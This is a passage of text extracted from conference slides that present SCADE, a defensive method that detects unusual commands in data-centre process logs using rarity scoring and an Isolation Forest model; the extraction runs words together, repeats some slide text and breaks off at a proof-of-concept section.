SANS360 - SCADE：检测数据中心中的隐藏威胁.pdf

1、SCADE:Detecting Hidden Threats in SCADE:Detecting Hidden Threats in Data CentersData CentersVaishali VinaySenior Data&Applied Scientist,Microsoft ResearchWhy Traditional Security Tools Fail in Data Centers?Built for Endpoints,Not Automation Alert Fatigue from High Volume Short-Lived Workloads&Visibi

2、lity Gaps No labeled datasetSCADE solves these problems with a Dual Layered ApproachPROCESSTelemetryFilter Process Creation logs(Event Id:4688)Identify commands that are statistically unusual across workloads.Assigns a rarity score to each command by analyzing historical execution patterns.Identify

3、commands that are statistically unusual across workloads.Assigns a rarity score to each command by analyzing historical execution patterns.High Confident AlertGlobal Analysis Detects Rare CommandAzure Security LogsLocal Analysis Detects True AnomaliesPROCESSTelemetryFilter Process Creation logs(Even

4、t Id:4688)Identify commands that are statistically unusual across workloads.Assigns a rarity score to each command by analyzing historical execution patterns.Executes behavioral analysis.Eliminates false positives from expected-rare-but-benign activity.High Confident AlertGlobal Analysis Detects Rar

5、e CommandAzure Security LogsLocal Analysis Detects True AnomaliesPowered by Statistical Methods:Log Entropy and BM25Powered by ML Model:Isolation ForestWhy SCADE?Smarter Anomaly Detection for Automation Heavy Environments Reduces False Positives Focuses on Meaningful Threats Works Without Labeled Da

6、ta Detects New&Unknown Attacks Explainability No More Black-Box Alerts Dynamic Thresholding Adapts to Workload Changes in Real-Time Designed for High-Scale EnvironmentsSCADE in Action:POC Data OverviewWe conducted a Proof of Concept(PoC)using real execution lo